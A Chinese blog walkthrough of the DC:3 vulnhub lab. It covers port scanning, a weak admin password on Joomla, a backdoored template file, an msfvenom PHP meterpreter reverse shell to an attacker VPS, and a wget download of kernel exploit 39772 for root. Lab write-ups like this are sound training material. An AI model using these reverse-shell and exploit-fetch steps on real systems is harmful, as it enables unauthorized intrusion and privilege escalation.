DC:3靶机 通关详解

已于 2023-04-12 13:45:05 修改
阅读量319 收藏
点赞数
分类专栏: 渗透打靶 文章标签: php 开发语言 网络安全 python
于 2023-03-26 18:30:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35782055/article/details/129778448
版权

信息收集

nmap -sS -O 192.168.45.0/24

在这里插入图片描述

nmap -A -p- 192.168.45.134

在这里插入图片描述
访问80端口
在这里插入图片描述
扫个目录
在这里插入图片描述
访问administrator目录,发现是joomla的cms
在这里插入图片描述

拿websehll

顺手尝试弱口令,猜测账号admin
在这里插入图片描述
在这里插入图片描述
在extensions template下有上传点在这里插入图片描述
我直接将error.php改成了后门
然后访问192.168.45.134
蚁剑连上
在这里插入图片描述
在这尝试用nc连接拿稳点的shell在这里插入图片描述
发现没有-e参数 那么用msf连

msfvenom -p php/meterpreter/reverse_tcp lhost=vps的ip地址 lport=9000

生成php代码
在这里插入图片描述
写入网站并访问
在这里插入图片描述

提权

有了稳定的shell后考虑提权
尝试suid提权无果
也没有什么定时任务
sudo也不知道命令,考虑看看系统内核版本
在这里插入图片描述
在这里插入图片描述

searchsploit ubuntu

这里使用39772的那个exp
下载后上传到vps
然后下载到靶机

wget http://xxxxxxxxx/39772.zip

解压完后直接运行
在这里插入图片描述
在这里插入图片描述
结束

丨Arcueid丨
关注
专栏目录
DC:5靶机通关详解
arcuied
04-17 273
DC:5靶机通关详解
DC:2靶机 通关详解
arcuied
03-22 355
DC:2靶机 通关详解
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)
qq_51577576的博客
04-05 1834
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
DC-1靶机通关
qq_63831588的博客
06-29 1601
DC1靶机,提权,夺旗赛,夺旗,渗透测试,黑盒测试
DC-6靶机通关
qq_63831588的博客
07-29 2079
做完感觉这个靶机还是很有意思的,并且它其实不难,但是这个思路真的很有意思。首先他的关键点在于让我们通过wp插件的漏洞去拿到webshell其次就是普通用户间的博弈,以往我们都是通过账号密码看来进行切换,而这次是通过sudo普通用户来切换然后最后的提权还是用的sudo,确实也听巧妙的,这次我愿称之为将 sudo 进行到底!!!~~~~~持续更新中。
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-4 通关详解 (附靶机搭建教程)
qq_51577576的博客
04-06 1233
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-4 通关详解 (附靶机搭建教程) 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
DC-1靶机通关教学(DC靶场系列)
qq_73413340的博客
08-26 885
好吧,就只有一个flag文件,根据之前的提示看一下配置文件,一般来说配置文件都有一些特别重要的信息在里面,搞不好还能提权,百度Drupal配置文件,路径挺复杂的不过知道名字叫settings.php,我们可以用命令直接搜索并打开,内联执行
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-2 通关详解 (附靶机搭建教程)
qq_51577576的博客
03-15 2313
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-2 通关详解 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-5 通关详解 (附靶机搭建教程)
qq_51577576的博客
04-12 1927
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-5 通关详解 (附靶机搭建教程) 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
DC:7靶机-Walkthrough
ins1ght的博客
09-23 2508
目前为止,做过的vlunhub里面的靶机里,这个算是比较开脑洞的了。首先发现网站首页footer部分多出的一个@DC7USER,这与一个未经DIY的Drupal站点的footer展示内容不同,进而通过Google搜索发现了放在Github上的系统登录口令,才有了后续的一系列操作。回忆起之前在某CTF大赛中打酱油的经历,那个时候也有一道Web题目,也是通过放在Github上的一个项目为突破口。历史真是TM惊人的相似……
sunset: noontide靶机渗透-vulnhub
m0_68117643的博客
07-18 1081
这台靶机(sunsetnoontide)运行在Vmware中无法获取靶机IP,换VirtualBox后NAT和桥接模式下也未获取到IP,仅在host-only模式下才找到靶机IP 突破点:反弹shell—root弱口令提权
DC-9靶机渗透详解
xiaocainiao2017的博客
12-07 2895
DC-9靶机 查看dc-9的mac地址 sudo arp-scan -l 找出dc-9的IP地址 sudo nmap -A -p- 10.9.11.26 扫描dc-9端口 访问80端口 查看wappalyzer dirb http://10.9.11.26/ 扫描目录 进入css 点击style.css 进另一个目录includes dirb效果不太好,使用dirmap。 访问http://10.9.11.26/display.php
【C语言系统编程】【第三部分:网络编程】3.2 数据传输和协议
10-03 1417
在进行网络编程时,有时需要设计并实现自定义协议,以满足特定应用的需求。自定义协议设计需要考虑到数据的传输、安全、效率等多方面因素。清晰性:协议应具有清晰的语法和语义,使开发者能快速理解和实现。扩展性:协议应允许未来的功能扩展,而不破坏现有功能。安全性:数据传输过程中应考虑加密和校验,以保证数据不被篡改。高效性:应尽可能减少网络带宽占用,提升数据传输效率。容错性:协议应能处理各种网络异常情况,如数据丢失、重复和延迟。
基于php的幸运舞蹈课程工作室管理系统
计算机学姐的博客
09-28 1034
【2025最新】基于php+vue+MySQL的幸运舞蹈课程工作室管理系统,前后端分离。
PHP安装后Apache无法运行的问题
Bingyeshinvwang的博客
10-01 697
php安装之后,修改httpd.conf无法运行Apache的解决方案
Thinkphp/Laravel基于vue的少数民族民歌网络图书馆管理系统
abo2022的博客
09-30 1219
ThinkPHP是一个快速、简单的基于MVC和面向对象的轻量级PHP开发框架,遵循Apache2开源协议发布,从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,尤其注重开发体验和易用性,并且拥有众多的原创功能和特性,为WEB应用开发提供了强有力的支持Laravel非常的简洁并且是开源的,Laravel 是一个具有表现力、优雅语法的 Web 应用程序框架. Laravel 是构建现代全栈 Web 应用程序的最佳选择.
CMSIS-RTOS V2封装层专题视频,一期视频将常用配置和用法梳理清楚,适用于RTX5和FreeRTOS(2024-09-28)
最新发布
Simon223的博客
10-04 699
CMSIS-RTOS V2封装层专题视频,一期视频将常用配置和用法梳理清楚,适用于RTX5和FreeRTOS(2024-09-28)
the planets: earth靶机
04-11
问题:关于行星:地球和静机。 回答:这个问题似乎出现了编码问题,其中“Earth静机”不是一个有意义的词语,因此无法给出明确的回答。如果问题中的“静机”是指其他行星,可以尝试使用正确的编码再次提交问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值